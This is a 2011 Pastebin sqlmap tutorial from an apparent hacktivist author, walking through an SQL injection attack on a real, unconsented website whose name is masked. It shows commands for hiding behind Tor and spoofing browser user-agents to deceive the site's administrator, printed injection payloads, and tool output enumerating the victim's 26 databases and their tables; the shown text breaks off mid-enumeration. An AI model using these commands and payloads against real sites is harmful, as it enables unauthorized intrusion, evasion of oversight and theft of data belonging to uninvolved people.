Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

getting started with sqlmap

By: a guest on Aug 9th, 2011  |  syntax: None  |  size: 50.15 KB  |  views: 8,108  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. Sqlmap Tutorial --
  2. by gh0st
  3.  
  4. big shout out to my brothers at irc.anonops.li #antisec
  5. especially DaMau55, Theory, and Storm -> what up guys!
  6.  
  7. WHO LOVES SQL INJECTION ?
  8.  
  9. Okay here we go...
  10.  
  11. Okay first of all what is sqlmap? Sqlmap is a script written in pyton that will save you so much time when it comes to sql injection attacks, with some amazing
  12. features. Since sqlmap is written in python it is a very portable application meaning that it will work on any operating system that supports Python. Which means
  13. that it will work in lamen terms on Windows and Linux and Unix based operating systems. Some of the featuers available are:
  14.  
  15. 1) takeover options
  16. 2) bruteforcing -> for tables/columns
  17. 3) database fingerprinting
  18. 4) google dork search options
  19. 4) command execution
  20. 5) operating system shell option
  21. 6) Proxy options
  22. 7) Enumeration options
  23. 8) password cracking options
  24. 9) and so much more...
  25.  
  26. First lets get a printout of the sqlmap.py -h (help) output:
  27.  
  28.  
  29.    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
  30.     http://sqlmap.sourceforge.net
  31.  
  32. Usage: python ./sqlmap.py [options]
  33.  
  34. Options:
  35.   --version             show program's version number and exit
  36.   -h, --help            show this help message and exit
  37.   -v VERBOSE            Verbosity level: 0-6 (default 1)
  38.  
  39.   Target:
  40.     At least one of these options has to be specified to set the source to
  41.     get target urls from.
  42.  
  43.     -d DIRECT           Direct connection to the database
  44.     -u URL, --url=URL   Target url
  45.     -l LOGFILE          Parse targets from Burp or WebScarab proxy logs
  46.     -m BULKFILE         Scan multiple targets enlisted in a given textual file
  47.     -r REQUESTFILE      Load HTTP request from a file
  48.     -g GOOGLEDORK       Process Google dork results as target urls
  49.     -c CONFIGFILE       Load options from a configuration INI file
  50.  
  51.   Request:
  52.     These options can be used to specify how to connect to the target url.
  53.  
  54.     --data=DATA         Data string to be sent through POST
  55.     --cookie=COOKIE     HTTP Cookie header
  56.     --cookie-urlencode  URL Encode generated cookie injections
  57.     --drop-set-cookie   Ignore Set-Cookie header from response
  58.     --user-agent=AGENT  HTTP User-Agent header
  59.     --random-agent      Use randomly selected HTTP User-Agent header
  60.     --referer=REFERER   HTTP Referer header
  61.     --headers=HEADERS   Extra HTTP headers newline separated
  62.     --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
  63.     --auth-cred=ACRED   HTTP authentication credentials (name:password)
  64.     --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
  65.     --proxy=PROXY       Use a HTTP proxy to connect to the target url
  66.     --proxy-cred=PCRED  HTTP proxy authentication credentials (name:password)
  67.     --ignore-proxy      Ignore system default HTTP proxy
  68.     --delay=DELAY       Delay in seconds between each HTTP request                                                                                                
  69.     --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)                                                                                    
  70.     --retries=RETRIES   Retries when the connection timeouts (default 3)                                                                                          
  71.     --scope=SCOPE       Regexp to filter targets from provided proxy log                                                                                          
  72.     --safe-url=SAFURL   Url address to visit frequently during testing                                                                                            
  73.     --safe-freq=SAFREQ  Test requests between two visits to a given safe url                                                                                      
  74.                                                                                                                                                                    
  75.   Optimization:                                                                                                                                                    
  76.     These options can be used to optimize the performance of sqlmap.                                                                                              
  77.                                                                                                                                                                    
  78.     -o                  Turn on all optimization switches
  79.     --predict-output    Predict common queries output
  80.     --keep-alive        Use persistent HTTP(s) connections
  81.     --null-connection   Retrieve page length without actual HTTP response body
  82.     --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
  83.  
  84.   Injection:
  85.     These options can be used to specify which parameters to test for,
  86.     provide custom injection payloads and optional tampering scripts.
  87.  
  88.     -p TESTPARAMETER    Testable parameter(s)
  89.     --dbms=DBMS         Force back-end DBMS to this value
  90.     --os=OS             Force back-end DBMS operating system to this value
  91.     --prefix=PREFIX     Injection payload prefix string
  92.     --suffix=SUFFIX     Injection payload suffix string
  93.     --tamper=TAMPER     Use given script(s) for tampering injection data
  94.  
  95.   Detection:
  96.     These options can be used to specify how to parse and compare page
  97.     content from HTTP responses when using blind SQL injection technique.
  98.  
  99.     --level=LEVEL       Level of tests to perform (1-5, default 1)
  100.     --risk=RISK         Risk of tests to perform (0-3, default 1)
  101.     --string=STRING     String to match in page when the query is valid
  102.     --regexp=REGEXP     Regexp to match in page when the query is valid
  103.     --text-only         Compare pages based only on the textual content
  104.  
  105.   Techniques:
  106.     These options can be used to tweak testing of specific SQL injection
  107.     techniques.
  108.  
  109.     --technique=TECH    SQL injection techniques to test for (default BEUST)
  110.     --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
  111.     --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
  112.     --union-char=UCHAR  Character to use for bruteforcing number of columns
  113.  
  114.   Fingerprint:
  115.     -f, --fingerprint   Perform an extensive DBMS version fingerprint
  116.  
  117.   Enumeration:
  118.     These options can be used to enumerate the back-end database
  119.     management system information, structure and data contained in the
  120.     tables. Moreover you can run your own SQL statements.
  121.  
  122.     -b, --banner        Retrieve DBMS banner
  123.     --current-user      Retrieve DBMS current user
  124.     --current-db        Retrieve DBMS current database
  125.     --is-dba            Detect if the DBMS current user is DBA
  126.     --users             Enumerate DBMS users
  127.     --passwords         Enumerate DBMS users password hashes
  128.     --privileges        Enumerate DBMS users privileges
  129.     --roles             Enumerate DBMS users roles
  130.     --dbs               Enumerate DBMS databases
  131.     --tables            Enumerate DBMS database tables
  132.     --columns           Enumerate DBMS database table columns
  133.     --schema            Enumerate DBMS schema
  134.     --count             Retrieve number of entries for table(s)
  135.     --dump              Dump DBMS database table entries
  136.     --dump-all          Dump all DBMS databases tables entries
  137.     --search            Search column(s), table(s) and/or database name(s)
  138.     -D DB               DBMS database to enumerate
  139.     -T TBL              DBMS database table to enumerate
  140.     -C COL              DBMS database table column to enumerate
  141.     -U USER             DBMS user to enumerate
  142.     --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
  143.     --start=LIMITSTART  First query output entry to retrieve
  144.     --stop=LIMITSTOP    Last query output entry to retrieve
  145.     --first=FIRSTCHAR   First query output word character to retrieve
  146.     --last=LASTCHAR     Last query output word character to retrieve
  147.     --sql-query=QUERY   SQL statement to be executed
  148.     --sql-shell         Prompt for an interactive SQL shell
  149.  
  150.   Brute force:
  151.     These options can be used to run brute force checks.
  152.  
  153.     --common-tables     Check existence of common tables
  154.     --common-columns    Check existence of common columns
  155.  
  156.   User-defined function injection:
  157.     These options can be used to create custom user-defined functions.
  158.  
  159.     --udf-inject        Inject custom user-defined functions
  160.     --shared-lib=SHLIB  Local path of the shared library
  161.  
  162.   File system access:
  163.     These options can be used to access the back-end database management
  164.     system underlying file system.
  165.  
  166.     --file-read=RFILE   Read a file from the back-end DBMS file system
  167.     --file-write=WFILE  Write a local file on the back-end DBMS file system
  168.     --file-dest=DFILE   Back-end DBMS absolute filepath to write to
  169.  
  170.   Operating system access:
  171.     These options can be used to access the back-end database management
  172.     system underlying operating system.
  173.  
  174.     --os-cmd=OSCMD      Execute an operating system command
  175.     --os-shell          Prompt for an interactive operating system shell
  176.     --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
  177.     --os-smbrelay       One click prompt for an OOB shell, meterpreter or VNC
  178.     --os-bof            Stored procedure buffer overflow exploitation
  179.     --priv-esc          Database process' user privilege escalation
  180.     --msf-path=MSFPATH  Local path where Metasploit Framework 3 is installed
  181.     --tmp-path=TMPPATH  Remote absolute path of temporary files directory
  182.  
  183.   Windows registry access:
  184.     These options can be used to access the back-end database management
  185.     system Windows registry.
  186.  
  187.     --reg-read          Read a Windows registry key value
  188.     --reg-add           Write a Windows registry key value data
  189.     --reg-del           Delete a Windows registry key value
  190.     --reg-key=REGKEY    Windows registry key
  191.     --reg-value=REGVAL  Windows registry key value
  192.     --reg-data=REGDATA  Windows registry key value data
  193.     --reg-type=REGTYPE  Windows registry key value type
  194.  
  195.   General:
  196.     These options can be used to set some general working parameters.
  197.  
  198.     -s SESSIONFILE      Save and resume all data retrieved on a session file
  199.     -t TRAFFICFILE      Log all HTTP traffic into a textual file
  200.     --batch             Never ask for user input, use the default behaviour
  201.     --charset=CHARSET   Force character encoding used for data retrieval
  202.     --eta               Display for each output the estimated time of arrival
  203.     --flush-session     Flush session file for current target
  204.     --fresh-queries     Ignores query results stored in session file
  205.     --save              Save options on a configuration INI file
  206.     --update            Update sqlmap
  207.  
  208.   Miscellaneous:
  209.     --beep              Alert when sql injection found
  210.     --check-payload     IDS detection testing of injection payloads
  211.     --cleanup           Clean up the DBMS by sqlmap specific UDF and tables
  212.     --forms             Parse and test forms on target url
  213.     --gpage=GOOGLEPAGE  Use Google dork results from specified page number
  214.     --mobile            Imitate smartphone through HTTP User-Agent header
  215.     --page-rank         Display page rank (PR) for Google dork results
  216.     --parse-errors      Parse DBMS error messages from response pages
  217.     --replicate         Replicate dumped data into a sqlite3 database
  218.     --tor               Use default Tor (Vidalia/Privoxy/Polipo) proxy address
  219.     --wizard            Simple wizard interface for beginner users
  220.  
  221.  
  222.  
  223. So many options right? Sqlmap can even be tied in with metasploit which i will try to cover at another time, for now i am going to go over some of my favorite options and this
  224. is really just a quick start to get you familiar with sqlmap and how to start using it right away. Okay so what can we do with this great script? I will show you...
  225.  
  226. First option that we will discuss is the proxy option (--proxy)
  227.  
  228. sqlmap is able to connect to its target web server through a proxy, which is great when you are trying to hide your real ip address. Sqlmap even comes with the (--tor) option
  229. so that if you have tor running on your operating system you can just use the --tor option and it will find either polipo/privoxy and connect to your target through your proxy.
  230.  
  231. I have written a very detailed tutorial on how to install/setup Tor on your linux system, if you have not read it i would suggest you check it out here:
  232.  
  233. Tor Tutorial written by gh0st:  
  234.  
  235. http://pastebin.com/XhTx8n3b
  236.  
  237.  
  238. Okay lets continue...
  239.  
  240. So for this tutorial the proxy that we will be using is Polipo from Tor. This is the syntax to have sqlmap connect to the target webserver through a proxy.
  241.  
  242. root@bt# python sqlmap.py --proxy="http://127.0.0.1:8118"
  243.  
  244. Okay now if you are not familiar with python scripts you need to add the word "python" infront of the script, (just like perl) or you can just use the ./ to run the script
  245.  
  246. root@bt# ./sqlmap.py --proxy="http://127.0.0.1:8118"
  247.  
  248.  
  249. Here please notice that 127.0.0.1 = localhost which is where we are running Polipo and "8118" is the port that polipo is running on. We can verify this with the following
  250. linux command:
  251.  
  252. root@bt:~# netstat -ntl
  253. Active Internet connections (only servers)
  254. Proto Recv-Q Send-Q Local Address           Foreign Address         State      
  255. tcp        0      0 127.0.0.1:8118          0.0.0.0:*               LISTEN    
  256. tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN    
  257. tcp        0      0 127.0.0.1:7175          0.0.0.0:*               LISTEN    
  258. tcp6       0      0 ::1:7175                :::*                    LISTEN    
  259.  
  260.  
  261.  
  262. Okay so now we have Sqlmap connecting to our target webserver through a proxy, we have hidden our real ip address so we are safe. Another great option would be to trick the admin
  263. of the target webserver in thinking that our connections/probing from sqlmap to his webserver is just different people connecting to his website. I will explain...
  264.  
  265. I know this will not be new information for some of you but for others this will be valuable information to them...
  266.  
  267. Okay when you connect to a webserver lets say its http://www.abc.com if you have a security conscience admin and he reviews his web logs, when a person is just connecting to
  268. his website they are making a connection on Port 80. Port 80 is where a webserver such as apache is running.. So when he looks at his logs if he sees something like this...
  269.  
  270. "Mozilla 5.0 (X11; U; Linux i686; en-US; rv 1.9.2.10) Gecko 2121120043 Firefox 3.6.10"
  271.  
  272. that is what will show up in the logs with an ip address attached to it and its just a basic connection from a firefox web browser to a webserver. And when you browse through
  273. the site different things will show up in the log, like (GET, POST, ETC ETC)
  274.  
  275. We can add trick the web admin into thinking that our probing and scanning from sqlmap could possibly be just a web browser browsing his website. Here is how we do this..
  276.  
  277. One of my favorite options on sqlmap..
  278.  
  279. --user-agent  
  280.  
  281. it will look like this:
  282.  
  283. --user-agent="Mozilla 5.0 (X11; U; Linux i686; en-US; rv 1.9.2.10) Gecko 2121120043 Firefox 3.6.10"
  284.  
  285. we can do this to make the admin think that our sqlmap probing his website is just a firefox web browser. But instead of typing all that information, we can just use the
  286. --random-agen option.
  287.  
  288. --random-agent     -> this will generate random agents for each connection made, and when we are using a proxy it will look like different browser agents from different ip
  289.                       addresses!
  290.  
  291. How great is that!
  292.  
  293.  
  294. So lets put it all together now...
  295.  
  296.  
  297. root@bt# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent
  298.  
  299.  
  300. Okay so we are covered so far by hiding our ip address and now we have random agents being generated for each connection made to our target address. Feels good don't it?
  301.  
  302.  
  303. Now lets get to the fun stuff!  Lets find a target!
  304.  
  305. Before i disply the next steps know that sqlmap.py has the (-g) options which is for google dorks and sqlmap.py given the right syntax will access google to find you a target
  306. matching the syntax you provide.
  307.  
  308.  
  309.  
  310. Okay we have a target lets get started...
  311.  
  312. All we need to do to provide a target for sqlmap to attack is provide this syntax:
  313.  
  314. root@bt# python sqlmap.py -u "target.com/news.php?id=11"
  315.  
  316.  
  317. so the syntax -> -u "targetsitegoeshere.com"
  318.  
  319.  
  320. now lets put it all together with our other options...
  321.  
  322.  
  323. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6"
  324.  
  325.     sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
  326.     http://sqlmap.sourceforge.net
  327.  
  328. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
  329.  
  330. [*] starting at: 18:37:16
  331.  
  332. [18:37:16] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5
  333. [18:37:16] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
  334. [18:37:17] [INFO] testing connection to the target url
  335. [18:37:21] [INFO] testing if the url is stable, wait a few seconds
  336. [18:37:22] [INFO] url is stable
  337. [18:37:22] [INFO] testing if GET parameter 'id' is dynamic
  338. [18:37:23] [INFO] confirming that GET parameter 'id' is dynamic
  339. [18:37:24] [INFO] GET parameter 'id' is dynamic
  340. [18:37:25] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
  341. [18:37:25] [INFO] testing sql injection on GET parameter 'id'
  342. [18:37:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  343. [18:37:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  344. [18:37:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  345. [18:37:29] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
  346. [18:37:29] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  347. [18:37:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  348. [18:38:11] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
  349. [18:38:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  350. [18:38:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  351. GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] N                  
  352. sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
  353. ---
  354. Place: GET
  355. Parameter: id
  356.     Type: boolean-based blind
  357.     Title: AND boolean-based blind - WHERE or HAVING clause
  358.     Payload: id=6 AND 8517=8517
  359.  
  360.     Type: error-based
  361.     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  362.     Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  363.  
  364.     Type: AND/OR time-based blind
  365.     Title: MySQL > 5.0.11 AND time-based blind
  366.     Payload: id=6 AND SLEEP(5)
  367. ---
  368.  
  369. [18:44:56] [INFO] manual usage of GET payloads requires url encoding
  370. [18:44:56] [INFO] the back-end DBMS is MySQL
  371.  
  372. web application technology: Apache
  373. back-end DBMS: MySQL 5.0
  374. [18:44:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'
  375.  
  376. [*] shutting down at: 18:44:56
  377.  
  378.  
  379. Okay now look above all we did was the following options broken down:
  380.  
  381. --proxy="http://127.0.0.1:8118"  -> Polipo/Tor Proxy
  382.  
  383. --random-agent                   -> make it look like a web browser
  384.  
  385. -u "target.com/info.php?id=6"    -> target
  386.  
  387.  
  388. Okay so you know i am going to hide the real website that i used because i feel it just wouldn't be right to post this information especially without them knowing...
  389.  
  390. This is the line you should take notice from above...
  391.  
  392. GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] N  
  393.  
  394. the site is vulnerable to sql injection... Do we want to try others? For this option you can almost always choose N because sqlmap has found what is injectable on the site
  395. and sqlmap has determined that the site is MySQL so if you were to choose yes on this option it would try other sql types and it is not neccesary here..
  396.  
  397.  
  398. MOVING ON!
  399.  
  400. Our current command line being used:
  401.  
  402. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6"
  403.  
  404.  
  405. Next thing we are going to add to our command line is this option (--dbs)
  406.  
  407. --dbs    ->  Enumerate DBMS databases
  408.          ->  DBMS = database management system
  409.  
  410.  
  411. This option (--dbs) will search our target website for available databases, how great is this!
  412.  
  413. Here we go...
  414.  
  415. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --dbs
  416.  
  417.     sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
  418.     http://sqlmap.sourceforge.net
  419.  
  420. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
  421.  
  422. [*] starting at: 18:45:17
  423.  
  424. [18:45:17] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9b5) Gecko/2008041514 Firefox/3.0b5
  425. [18:45:17] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
  426. [18:45:17] [INFO] resuming injection data from session file
  427. [18:45:17] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  428. [18:45:18] [INFO] testing connection to the target url
  429. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  430. ---
  431. Place: GET
  432. Parameter: id
  433.     Type: boolean-based blind
  434.     Title: AND boolean-based blind - WHERE or HAVING clause
  435.     Payload: id=6 AND 8517=8517
  436.  
  437.     Type: error-based
  438.     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  439.     Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  440.  
  441.     Type: AND/OR time-based blind
  442.     Title: MySQL > 5.0.11 AND time-based blind
  443.     Payload: id=6 AND SLEEP(5)
  444. ---
  445.  
  446. [18:45:19] [INFO] manual usage of GET payloads requires url encoding
  447. [18:45:19] [INFO] the back-end DBMS is MySQL
  448.  
  449. web application technology: Apache
  450. back-end DBMS: MySQL 5.0
  451. [18:45:19] [INFO] fetching database names
  452. [18:45:20] [INFO] the SQL query used returns 26 entries
  453. [18:45:20] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
  454. [18:45:21] [INFO] retrieved: testpiotr
  455. [18:45:22] [INFO] retrieved: test
  456. [18:45:22] [INFO] retrieved: sma
  457. [18:45:23] [INFO] retrieved: sale
  458. [18:45:24] [INFO] retrieved: rk2009
  459. [18:45:25] [INFO] retrieved: rk
  460. [18:45:25] [INFO] retrieved: pathologistsmeetclinicians
  461. [18:45:26] [INFO] retrieved: ncp
  462. [18:45:27] [INFO] retrieved: mysql
  463. [18:45:28] [INFO] retrieved: mydb
  464. [18:45:29] [INFO] retrieved: lowers
  465. [18:45:29] [INFO] retrieved: limesurvey
  466. [18:45:30] [INFO] retrieved: lemon8xml
  467. [18:45:32] [INFO] retrieved: idaho_test_usun
  468. [18:45:33] [INFO] retrieved: ici_corporate
  469. [18:45:34] [INFO] retrieved: grants
  470. [18:45:35] [INFO] retrieved: fored2010
  471. [18:45:36] [INFO] retrieved: egroupware
  472. [18:45:36] [INFO] retrieved: db_test
  473. [18:45:37] [INFO] retrieved: bugtracker
  474. [18:45:38] [INFO] retrieved: blogic
  475. [18:45:39] [INFO] retrieved: avea
  476. [18:45:40] [INFO] retrieved: IC2
  477. [18:45:41] [INFO] retrieved: information_schema
  478. available databases [26]:
  479. [*] avea
  480. [*] blogic
  481. [*] bugtracker
  482. [*] db_test
  483. [*] egroupware
  484. [*] fored2010
  485. [*] grants
  486. [*] IC2
  487. [*] ici_corporate
  488. [*] idaho_test_usun
  489. [*] information_schema
  490. [*] lemon8xml
  491. [*] limesurvey
  492. [*] lowers
  493. [*] mydb
  494. [*] mysql
  495. [*] ncp
  496. [*] pathologistsmeetclinicians
  497. [*] rk
  498. [*] rk2009
  499. [*] sale
  500. [*] sma
  501. [*] test
  502. [*] testpiotr
  503.  
  504. [18:45:41] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'
  505.  
  506. [*] shutting down at: 18:45:41
  507.  
  508.  
  509. WOW!!!  Sqlmap has found 26 databases!  A few of the databases have been removed to hide the identity of the website. Forgive me =-P
  510.  
  511.  
  512. Okay well what now? Next we need to do a little digging, and we need to find some good tables and columns so we can exploit this website. Lets start with the database
  513.  
  514. [*] mydb
  515.  
  516. We are going to see what is in the database (mydb)
  517.  
  518. we are going to add these options to our command line:
  519.  
  520. -D mydb    -> this tells sqlmap to use the database mydb (-D) options is for databse
  521.  
  522. --tables   -> this tells sqlmap to search for tables in the (mydb) database
  523.  
  524.  
  525. NOTE: because the database [*]information_schema is available we are able to get databases/tables/columns right away. If for whatever reason this database was not available
  526. to us then sqlmap would use a bruteforce attack trying 30,000+ common table names to try and find other tables/columns and do note that this can take awile.
  527.  
  528. MOVNIG ON!
  529.  
  530.  
  531. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --tables -D mydb
  532.  
  533.     sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
  534.     http://sqlmap.sourceforge.net
  535.  
  536. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
  537.  
  538. [*] starting at: 18:46:51
  539.  
  540. [18:46:51] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322)
  541. [18:46:51] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
  542. [18:46:51] [INFO] resuming injection data from session file
  543. [18:46:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  544. [18:46:51] [INFO] testing connection to the target url
  545. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  546. ---
  547. Place: GET
  548. Parameter: id
  549.     Type: boolean-based blind
  550.     Title: AND boolean-based blind - WHERE or HAVING clause
  551.     Payload: id=6 AND 8517=8517
  552.  
  553.     Type: error-based
  554.     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  555.     Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  556.  
  557.     Type: AND/OR time-based blind
  558.     Title: MySQL > 5.0.11 AND time-based blind
  559.     Payload: id=6 AND SLEEP(5)
  560. ---
  561.  
  562. [18:46:52] [INFO] manual usage of GET payloads requires url encoding
  563. [18:46:52] [INFO] the back-end DBMS is MySQL
  564.  
  565. web application technology: Apache
  566. back-end DBMS: MySQL 5.0
  567. [18:46:52] [INFO] fetching tables for database: mydb
  568. [18:46:54] [INFO] the SQL query used returns 2 entries
  569. [18:46:54] [INFO] retrieved: mydb
  570. [18:46:55] [INFO] retrieved: WORKER
  571. [18:46:56] [INFO] retrieved: mydb
  572. [18:46:57] [INFO] retrieved: COMPANY
  573. Database: mydb
  574. [2 tables]
  575. +---------+
  576. | COMPANY |
  577. | WORKER  |
  578. +---------+
  579.  
  580. [18:46:57] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.indexHIDEN.com'
  581.  
  582. [*] shutting down at: 18:46:57
  583.  
  584.  
  585. Okay as you can hopefully see that there is only 2 tables available to us on DATABASE mydb, and there is nothing sexy or usefull here so we will move on...
  586.  
  587.  
  588. NOTE: one thing i would like you to notice is that sqlmap.py logs all information and sessions to the following directory under backtrack linux:
  589.  
  590. sqlmap logs output to directory -> /pentest/database/sqlmap/output/www.targetwebsite.com
  591.  
  592. So you can find all information and recordings of everything in that directory, this is very important!!
  593.  
  594.  
  595. MOVING ON!!
  596.  
  597. We need to pick another database to enumerate so i will try the database (mysql)
  598.  
  599.  
  600. root@bt:/pentest/database/sqlmap# python sqlmap.py --proxy="http://127.0.0.1:8118" --random-agent -u "http://www.indexHIDEN.com/info.php?id=6" --tables -D mysql
  601.  
  602.     sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
  603.     http://sqlmap.sourceforge.net
  604.  
  605. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
  606.  
  607. [*] starting at: 18:47:55
  608.  
  609. [18:47:55] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Opera/9.22 (Windows NT 5.1; U; SV1; MEGAUPLOAD 1.0; ru)
  610. [18:47:55] [INFO] using '/pentest/database/sqlmap/output/www.indexHIDEN.com/session' as session file
  611. [18:47:55] [INFO] resuming injection data from session file
  612. [18:47:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  613. [18:47:55] [INFO] testing connection to the target url
  614. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  615. ---
  616. Place: GET
  617. Parameter: id
  618.     Type: boolean-based blind
  619.     Title: AND boolean-based blind - WHERE or HAVING clause
  620.     Payload: id=6 AND 8517=8517
  621.  
  622.     Type: error-based
  623.     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  624.     Payload: id=6 AND (SELECT 1834 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,111,114,58),(SELECT (CASE WHEN (1834=1834) THEN 1 ELSE 0 END)),CHAR(58,103,97,109,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  625.  
  626.     Type: AND/OR time-based blind
  627.     Title: MySQL > 5.0.11 AND time-based blind
  628.     Payload: id=6 AND SLEEP(5)
  629. ---
  630.  
  631. [18:48:03] [INFO] manual usage of GET payloads requires url encoding
  632. [18:48:03] [INFO] the back-end DBMS is MySQL
  633.  
  634. web application technology: Apache
  635. back-end DBMS: MySQL 5.0
  636. [18:48:03] [INFO] fetching tables for database: mysql
  637. [18:48:04] [INFO] the SQL query used returns 18 entries
  638. [18:48:05] [INFO] retrieved: mysql
  639. [18:48:05] [INFO] retrieved: user_info
  640. [18:48:06] [INFO] retrieved: mysql
  641. [18:48:07] [INFO] retrieved: user
  642. [18:48:07] [INFO] retrieved: mysql
  643. [18:48:08] [INFO] retrieved: time_zone_transition_type
  644. [18:48:09] [INFO] retrieved: mysql
  645. [18:48:09] [INFO] retrieved: time_zone_transition
  646. [18:48:10] [INFO] retrieved: mysql
  647. [18:48:10] [INFO] retrieved: time_zone_name
  648. [18:48:11] [INFO] retrieved: mysql
  649. [18:48:12] [INFO] retrieved: time_zone_leap_second
  650. [18:48:12] [INFO] retrieved: mysql
  651. [18:48:13] [INFO] retrieved: time_zone
  652. [18:48:14] [INFO] retrieved: mysql
  653. [18:48:14] [INFO] retrieved: tables_priv
  654. [18:48:15] [INFO] retrieved: mysql
  655. [18:48:16] [INFO] retrieved: procs_priv
  656. [18:48:17] [INFO] retrieved: mysql
  657. [18:48:17] [INFO] retrieved: proc
  658. [18:48:18] [INFO] retrieved: mysql
  659. [18:48:19] [INFO] retrieved: host
  660. [18:48:19] [INFO] retrieved: mysql
  661. [18:48:20] [INFO] retrieved: help_topic
  662. [18:48:21] [INFO] retrieved: mysql
